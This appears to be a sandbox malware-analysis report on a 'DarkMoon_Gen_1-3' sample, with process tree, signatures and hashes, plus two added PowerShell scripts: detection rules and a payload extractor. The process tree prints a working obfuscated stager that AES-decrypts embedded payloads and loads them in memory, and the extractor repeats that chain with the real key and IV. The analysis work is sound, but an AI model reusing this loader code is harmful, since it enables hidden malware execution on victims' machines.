Analysis
- max time kernel: 122s
- max time network: 123s
- platform: windows7_x64
- resource: win7-20240508-en
- resource tags: arch:x64 arch:x86 image:win7-20240508-en locale:en-us os:windows7-x64 system
- submitted: 02-06-2024 15:12
Static task
static1
Behavioral task
behavioral1
Sample
DarkMoon_Gen_1-3/lib/main.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral2
Sample
DarkMoon_Gen_1-3/lib/uni.bat
Resource
win7-20240220-en
Behavioral task
behavioral3
Sample
DarkMoon_Gen_1-3/lib/uni.bat
Resource
win10v2004-20240426-en
Behavioral task
behavioral4
Sample
DarkMoon_Gen_1-3/starter.bat
Resource
win7-20240508-en
Behavioral task
behavioral5
Sample
DarkMoon_Gen_1-3/starter.bat
Resource
win10v2004-20240426-en
General
- Target: DarkMoon_Gen_1-3/starter.bat
- Size: 51B
- MD5: abc778ba27885c72f364ad89b1306862
- SHA1: 2d4bfe8e2de4390109e8fa786ad47ec68daeaffe
- SHA256: 97c5438395ba799a673564195db730de8d9742a7a141566fa7c9075c46e3a039
- SHA512: 65a9bcdb3493526dd0b340aacabd30cd2e577a03cac920341e7be041e8de133ced0ab45c14a2509fbbd6f2451ac3ef1f5d520328d44f06aa4af6bfb122991f8f
Malware Config
Signatures
- Executes dropped EXE (1 IoC)
  Processes: PID 2104 uni.bat.exe
- Loads dropped DLL (1 IoC)
  Processes: PID 2136 cmd.exe
- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes: main.exe
  Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 1 IoC)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Delays execution with timeout.exe (13 IoCs)
  Processes: timeout.exe, PIDs 2660, 2800, 2272, 2316, 3012, 1984, 2028, 1188, 484, 2908, 1388, 2308, 1904
- Runs ping.exe (1 TTP, 17 IoCs)
  Processes: PING.EXE, PIDs 2328, 2752, 1628, 1312, 2732, 2584, 2676, 2596, 2488, 468, 768, 1280, 2740, 2604, 2644, 2912, 2816
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  Processes: PID 2104 uni.bat.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: PID 2104 uni.bat.exe, Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes (source PID/process -> target PID/process, number of writes):
  2056 cmd.exe -> 2136 cmd.exe (3)
  2056 cmd.exe -> 2188 main.exe (3)
  2188 main.exe -> 2904 cmd.exe (3)
  2904 cmd.exe -> 2100 chcp.com (3)
  2904 cmd.exe -> 3012 timeout.exe (3)
  2904 cmd.exe -> 2676 PING.EXE (3)
  2904 cmd.exe -> 2740 PING.EXE (3)
  2904 cmd.exe -> 2604 PING.EXE (3)
  2904 cmd.exe -> 2596 PING.EXE (3)
  2904 cmd.exe -> 2328 PING.EXE (3)
  2904 cmd.exe -> 2732 PING.EXE (3)
  2904 cmd.exe -> 2584 PING.EXE (3)
  2904 cmd.exe -> 2644 PING.EXE (3)
  2904 cmd.exe -> 2488 PING.EXE (3)
  2904 cmd.exe -> 1984 timeout.exe (3)
  2904 cmd.exe -> 2912 PING.EXE (3)
  2136 cmd.exe -> 2104 uni.bat.exe (3)
  2904 cmd.exe -> 2660 timeout.exe (3)
  2904 cmd.exe -> 2752 PING.EXE (3)
  2904 cmd.exe -> 2800 timeout.exe (3)
  2904 cmd.exe -> 2816 PING.EXE (3)
  2904 cmd.exe -> 2908 timeout.exe (1)
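Added example, not part of the sandbox report: PowerShell triage rules for the loader behaviour recorded in these signatures, run over constructed process-creation records (Image and CommandLine, the two fields a Sysmon Event ID 1 or Security 4688 event carries; the records in the script are made up to mirror the process tree and are not sandbox output). Two points worth keeping in mind when turning these signatures into rules: the RunOnce value wextract_cleanup0, which points rundll32 at advpack.dll,DelNodeRunDLL32 for an IXP000.TMP directory, is the cleanup entry that the Windows IExpress self-extractor (wextract) writes, so it identifies main.exe as an IExpress package and schedules deletion of the extraction folder at next logon rather than starting a payload; and the process named uni.bat.exe carries powershell.exe's own switches (-noprofile, -windowstyle hidden, -ep bypass, -command) under a non-PowerShell image name, which, together with the reversed-string method names and the Assembly.Load plus EntryPoint.Invoke pattern in the same command line, is the hook that survives a rename of the stager. The rules below check exactly those four things.

```powershell
# Added example, not part of the sandbox report: command-line triage rules for
# the loader behaviour in this analysis, run over constructed process-creation
# records (Image and CommandLine, the fields a Sysmon Event ID 1 or Security
# 4688 event carries). The sample records are made up to mirror the report.

function Test-StagerCommandLine {
    param(
        [Parameter(Mandatory)] [string] $Image,
        [Parameter(Mandatory)] [string] $CommandLine
    )
    $findings = New-Object 'System.Collections.Generic.List[string]'
    $leaf = [IO.Path]::GetFileName($Image)

    # Rule 1: powershell.exe switches under an image that is not the PowerShell host
    # (uni.bat.exe in the report runs with -noprofile -windowstyle hidden -ep bypass -command).
    $switches = [regex]::Matches($CommandLine,
        '(?i)(?:^|\s)-(?:noprofile|nop|windowstyle|executionpolicy|ep|command|encodedcommand|enc)\b')
    if ($switches.Count -ge 2 -and $leaf -notmatch '^(powershell|pwsh)\.exe$') {
        $findings.Add("PowerShell switches ($($switches.Count)) under non-PowerShell image '$leaf'")
    }

    # Rule 2: reversed-string member names such as 'gnirtS46esaBmorF'[-1..-16] -join ''.
    # Each one is reversed back so the analyst sees the real .NET name.
    $decoded = @()
    foreach ($m in [regex]::Matches($CommandLine, "'([A-Za-z0-9_]+)'\[-1\.\.-\d+\]\s*-join\s*''")) {
        $chars = $m.Groups[1].Value.ToCharArray()
        [array]::Reverse($chars)
        $decoded += (-join $chars)
    }
    if ($decoded.Count -gt 0) {
        $findings.Add('reversed-string member names: ' + (($decoded | Select-Object -Unique) -join ', '))
    }

    # Rule 3: in-memory .NET loading. The stager calls Assembly.Load on the decrypted
    # bytes and then invokes EntryPoint, so require the reflection type, a literal or
    # decoded 'Load', and EntryPoint or .Invoke( on the same command line.
    $hasLoad = ($decoded -contains 'Load') -or ($CommandLine -match 'Assembly\]::Load\b')
    if ($CommandLine -match 'System\.Reflection\.Assembly' -and $hasLoad -and
        $CommandLine -match 'EntryPoint|\.Invoke\(') {
        $findings.Add('reflective assembly load followed by EntryPoint.Invoke')
    }

    # Rule 4: inline AES decryption with an embedded key and IV.
    if ($CommandLine -match 'Cryptography\.Aes\]::Create' -and
        $CommandLine -match '\.Key\s*=' -and $CommandLine -match '\.IV\s*=') {
        $findings.Add('inline AES decryption with embedded key and IV')
    }

    [pscustomobject]@{ Image = $leaf; Suspicious = ($findings.Count -gt 0); Findings = $findings.ToArray() }
}

# Constructed records: the first two mirror the process tree in the report (the
# stager is trimmed to its distinctive tokens), the third is a benign control
# that must not fire.
$records = @(
    @{ Image = 'C:\Windows\system32\cmd.exe'
       CommandLine = 'C:\Windows\system32\cmd.exe /K uni.bat' },
    @{ Image = 'C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe'
       CommandLine = '"uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command ' +
                     '$a=[System.Security.Cryptography.Aes]::Create(); ' +
                     '$a.Key=[System.Convert]::(''gnirtS46esaBmorF''[-1..-16] -join '''')(''...''); ' +
                     '$a.IV=[System.Convert]::(''gnirtS46esaBmorF''[-1..-16] -join '''')(''...''); ' +
                     '$n=[System.Reflection.Assembly]::(''daoL''[-1..-4] -join '''')([byte[]]$b); ' +
                     '$n.EntryPoint.Invoke($null, $args)' },
    @{ Image = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
       CommandLine = 'powershell.exe -noprofile -command Get-Date' }
)

foreach ($r in $records) { Test-StagerCommandLine @r }
```

To run this over real telemetry, map Sysmon's Image and CommandLine fields onto the two parameters. The benign powershell.exe control shows that Rule 1 keys on the image name, not on the switches alone; Rules 2 to 4 fire on the stager regardless of what the host binary is called.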
Processes (tree depth in brackets; image | command line | signatures)
- [1] C:\Windows\system32\cmd.exe | cmd /c "C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\starter.bat" | Suspicious use of WriteProcessMemory
  - [2] C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /K uni.bat | Loads dropped DLL; Suspicious use of WriteProcessMemory
    - [3] C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe | Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      Command line:
      "uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function PCvVf($yFrQM){ $KryQB=[System.Security.Cryptography.Aes]::Create(); $KryQB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KryQB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KryQB.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWxz9LOIFbVN1/7cN9UWMlncfIJFIhU1cXRWWiP9bXg='); $KryQB.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EIdWPSRydSjZkTvenqbEOg=='); $TSyON=$KryQB.CreateDecryptor(); $return_var=$TSyON.TransformFinalBlock($yFrQM, 0, $yFrQM.Length); $TSyON.Dispose(); $KryQB.Dispose(); $return_var;}function DJYpo($yFrQM){ $rdKbv=New-Object System.IO.MemoryStream(,$yFrQM); $nDivC=New-Object System.IO.MemoryStream; $KhHzB=New-Object System.IO.Compression.GZipStream($rdKbv, [IO.Compression.CompressionMode]::Decompress); $KhHzB.CopyTo($nDivC); $KhHzB.Dispose(); $rdKbv.Dispose(); $nDivC.Dispose(); $nDivC.ToArray();}function mCQbd($yFrQM,$cFYDO){ $nHpHM=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$yFrQM); $KnSYu=$nHpHM.EntryPoint; $KnSYu.Invoke($null, $cFYDO);}$PdisG=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat').Split([Environment]::NewLine);foreach ($gyYDO in $PdisG) { if ($gyYDO.StartsWith('SEROXEN')) { $UdMrg=$gyYDO.Substring(7); break; }}$ekLHX=[string[]]$UdMrg.Split('\');$HlrJz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[0])));$ejeLz=DJYpo (PCvVf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ekLHX[1])));mCQbd $ejeLz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));mCQbd $HlrJz (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
  - [2] C:\Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\main.exe | main.exe | Adds Run key to start application; Suspicious use of WriteProcessMemory
    - [3] C:\Windows\system32\cmd.exe | cmd /c "Dark Moon gen.bat" | Suspicious use of WriteProcessMemory
      - [4] C:\Windows\system32\chcp.com | chcp 65001
      - [4] C:\Windows\system32\timeout.exe | timeout 2 | Delays execution with timeout.exe
      - [4] C:\Windows\system32\PING.EXE | ping localhost -n 1 | Runs ping.exe
      - [4] C:\Windows\system32\PING.EXE | ping localhost -n 1 | Runs ping.exe
      - [4] C:\Windows\system32\PING.EXE | ping localhost -n 1 | Runs ping.exe
      - [4] C:\Windows\system32\PING.EXE | ping localhost -n 1 | Runs ping.exe
      - [4] C:\Windows\system32\PING.EXE | ping localhost -n 1 | Runs ping.exe
      - [4] C:\Windows\system32\PING.EXE | ping localhost -n 1 | Runs ping.exe
      - [4] C:\Windows\system32\PING.EXE | ping localhost -n 1 | Runs ping.exe
      - [4] C:\Windows\system32\PING.EXE | ping localhost -n 1 | Runs ping.exe
      - [4] C:\Windows\system32\PING.EXE | ping discord.com | Runs ping.exe
      - [4] C:\Windows\system32\timeout.exe | timeout 0 | Delays execution with timeout.exe
      - [4] C:\Windows\system32\PING.EXE | ping www.paysafecard.com | Runs ping.exe
      - [4] C:\Windows\system32\timeout.exe | timeout 0 | Delays execution with timeout.exe
      - [4] C:\Windows\system32\PING.EXE | ping www.amazon.com | Runs ping.exe
      - [4] C:\Windows\system32\timeout.exe | timeout 0 | Delays execution with timeout.exe
      - [4] C:\Windows\system32\PING.EXE | ping play.google.com | Runs ping.exe
      - [4] C:\Windows\system32\timeout.exe | timeout 0 | Delays execution with timeout.exe
      - [4] C:\Windows\system32\PING.EXE | ping store.steampowered.com | Runs ping.exe
      - [4] C:\Windows\system32\timeout.exe | timeout 0 | Delays execution with timeout.exe
      - [4] C:\Windows\system32\PING.EXE | ping netflix.com | Runs ping.exe
      - [4] C:\Windows\system32\timeout.exe | timeout 0 | Delays execution with timeout.exe
      - [4] C:\Windows\system32\PING.EXE | ping www.spotify.com | Runs ping.exe
      - [4] C:\Windows\system32\timeout.exe | timeout 0 | Delays execution with timeout.exe
      - [4] C:\Windows\system32\PING.EXE | ping www.xbox.com | Runs ping.exe
      - [4] C:\Windows\system32\timeout.exe | timeout 0 | Delays execution with timeout.exe
      - [4] C:\Windows\system32\timeout.exe | timeout 1 | Delays execution with timeout.exe
      - [4] C:\Windows\system32\timeout.exe | timeout 2 | Delays execution with timeout.exe
      - [4] C:\Windows\system32\timeout.exe | timeout 2 | Delays execution with timeout.exe
      - [4] C:\Windows\system32\PING.EXE | ping www.google.com | Runs ping.exe
      - [4] C:\Windows\system32\timeout.exe | timeout 2 | Delays execution with timeout.exe
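Added example, not part of the sandbox report or of the sample: a defanged extractor that pulls the two encrypted stages out of uni.bat the way the uni.bat.exe stager in the tree above does. The stager's reversed string literals resolve to FromBase64String ('gnirtS46esaBmorF'), Load ('daoL') and ReadAllText ('txeTllAdaeR'). It reads uni.bat back (the same file cmd.exe /K had just executed), takes the first line that starts with SEROXEN, splits the remainder on a backslash, and for each half does Base64 decode, AES-CBC with PKCS7 padding using the 32-byte key and 16-byte IV embedded in the command line (a 32-byte key makes this AES-256), then GZip decompress, before handing the bytes to Assembly.Load and invoking the entry point with the two 50-character string arguments shown; the half at index 1 is invoked first. The script below repeats only the decode chain and writes each stage to disk with its SHA256. The output directory name and the invocation shown afterwards are assumptions, and it must be run inside an isolated analysis VM because the outputs are live payloads.

```powershell
# Added example, not part of the sandbox report: offline extractor for the two
# payloads the uni.bat.exe stager decodes. It repeats the stager's chain
# (Base64 -> AES-256-CBC/PKCS7 -> GZip) with the key and IV from the captured
# command line, but writes the results to disk and hashes them instead of
# passing them to Assembly.Load. Run it only inside an isolated analysis VM.
param(
    [Parameter(Mandatory)] [string] $BatPath,   # path to the captured uni.bat
    [string] $OutDir = '.\extracted'            # assumed output folder, not taken from the sample
)

# Key (32 bytes, so AES-256) and IV (16 bytes) exactly as hardcoded by the stager.
$Key = [Convert]::FromBase64String('mWxz9LOIFbVN1/7cN9UWMlncfIJFIhU1cXRWWiP9bXg=')
$IV  = [Convert]::FromBase64String('EIdWPSRydSjZkTvenqbEOg==')

function Unprotect-Blob([byte[]] $Data) {
    # Mirrors the stager's PCvVf: AES, CBC mode, PKCS7 padding.
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = $Key
    $aes.IV  = $IV
    $dec = $aes.CreateDecryptor()
    try     { $plain = $dec.TransformFinalBlock($Data, 0, $Data.Length) }
    finally { $dec.Dispose(); $aes.Dispose() }
    ,$plain   # leading comma returns the byte[] as one object instead of unrolling it
}

function Expand-Gzip([byte[]] $Data) {
    # Mirrors the stager's DJYpo.
    $in  = New-Object System.IO.MemoryStream(,$Data)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    try     { $gz.CopyTo($out); $bytes = $out.ToArray() }
    finally { $gz.Dispose(); $in.Dispose(); $out.Dispose() }
    ,$bytes
}

# The stager takes the first line of uni.bat that starts with 'SEROXEN', drops
# those 7 characters and splits the rest on '\' into two Base64 blobs.
$marker = [IO.File]::ReadAllLines($BatPath) | Where-Object { $_.StartsWith('SEROXEN') } | Select-Object -First 1
if (-not $marker) { throw "No line starting with SEROXEN in $BatPath" }
$blobs = $marker.Substring(7).Split('\')
if ($blobs.Count -lt 2) { throw "Expected two backslash-separated blobs, found $($blobs.Count)" }

New-Item -ItemType Directory -Force -Path $OutDir | Out-Null

# Blob index 1 is the one the stager invokes first; both are decoded here.
for ($i = 0; $i -lt 2; $i++) {
    [byte[]] $stage = Expand-Gzip (Unprotect-Blob ([Convert]::FromBase64String($blobs[$i])))
    $path = Join-Path $OutDir ('stage{0}.bin' -f $i)
    [IO.File]::WriteAllBytes($path, $stage)
    # Assembly.Load expects a .NET PE, so a missing MZ header means the chain did not decode as expected.
    $isPe = ($stage.Length -ge 2 -and $stage[0] -eq 0x4D -and $stage[1] -eq 0x5A)
    [pscustomobject]@{
        Stage  = $i
        Bytes  = $stage.Length
        MZ     = $isPe
        SHA256 = (Get-FileHash -Algorithm SHA256 -Path $path).Hash
        Path   = $path
    }
}
```

Assuming the script is saved as Extract-Stages.ps1 (a name chosen here), it is run as `.\Extract-Stages.ps1 -BatPath .\DarkMoon_Gen_1-3\lib\uni.bat`. A CryptographicException from TransformFinalBlock means the blob was not encrypted with this key and IV (a different build of the stager), and MZ = False on a stage means the bytes are not a PE and the chain should be re-checked before the file is handed to any .NET tooling.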
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Dark Moon gen.bat
  Filesize: 35KB
  MD5: c153581143e0b72cecae38a393991a4b
  SHA1: da43d03b19765594ff124415a060551343823a39
  SHA256: 2fa64c968a0fe02d626a225ecc2e1e4a5185f73d70a0557f32f2bbea76361005
  SHA512: 8c9807f4a3044f49d99e5b1c2a20d112eba61570fa0e725777a3bd84d6a0e7df1c604579863e27c6d0617c2c84fa4ae8c3b7525e37f7e7ee9c6ef26b6c9db40f
- \Users\Admin\AppData\Local\Temp\DarkMoon_Gen_1-3\lib\uni.bat.exe
  Filesize: 462KB
  MD5: 852d67a27e454bd389fa7f02a8cbe23f
  SHA1: 5330fedad485e0e4c23b2abe1075a1f984fde9fc
  SHA256: a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
  SHA512: 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
- memory/2104-8-0x000000001B3A0000-0x000000001B682000-memory.dmp
  Filesize: 2.9MB
- memory/2104-9-0x0000000002180000-0x0000000002188000-memory.dmp
  Filesize: 32KB